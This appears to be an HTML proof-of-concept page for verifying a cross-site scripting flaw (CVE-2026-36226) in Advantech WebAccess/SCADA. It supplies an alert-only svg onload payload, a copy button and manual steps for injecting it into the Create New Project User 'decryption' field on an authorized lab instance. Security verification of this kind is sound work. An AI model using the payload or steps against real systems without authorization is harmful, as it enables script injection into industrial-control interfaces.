<!doctype html>
<meta charset="utf-8">
<title>CVE-2026-36226 Benign XSS Verifier</title>
<style>
  body {
    color: #1f2937;
    font: 16px/1.5 system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", sans-serif;
    margin: 2rem auto;
    max-width: 860px;
    padding: 0 1rem;
  }
  textarea, input, button {
    box-sizing: border-box;
    font: inherit;
    width: 100%;
  }
  textarea {
    min-height: 110px;
  }
  code, pre {
    background: #f3f4f6;
    border-radius: 6px;
    padding: 0.15rem 0.35rem;
  }
  pre {
    overflow: auto;
    padding: 1rem;
    white-space: pre-wrap;
  }
  button {
    margin-top: 0.75rem;
    padding: 0.65rem;
  }
</style>
<h1>CVE-2026-36226 Benign XSS Verifier</h1>
<p>
  This helper generates a harmless alert-based payload for authorized testing of
  the Advantech WebAccess/SCADA Create New Project User <code>decryption</code>
  field. It does not send traffic.
</p>
<label for="payload">Payload</label>
<textarea id="payload">"><svg/onload=alert("CVE-2026-36226")></textarea>
<button id="copy" type="button">Copy Payload</button>
<h2>Manual Verification</h2>
<ol>
  <li>Log in to an authorized lab instance of Advantech WebAccess/SCADA 8.0-2015.08.16.</li>
  <li>Open the Admin Dashboard and navigate to Create New Project User.</li>
  <li>Paste the payload into the <code>decryption</code> field.</li>
  <li>Save or preview the user record and observe whether the payload executes in the browser.</li>
</ol>
<pre id="status">Ready.</pre>
<script>
  document.getElementById('copy').addEventListener('click', async () => {
    const payload = document.getElementById('payload').value;
    await navigator.clipboard.writeText(payload);
    document.getElementById('status').textContent = 'Copied payload to clipboard.';
  });
</script>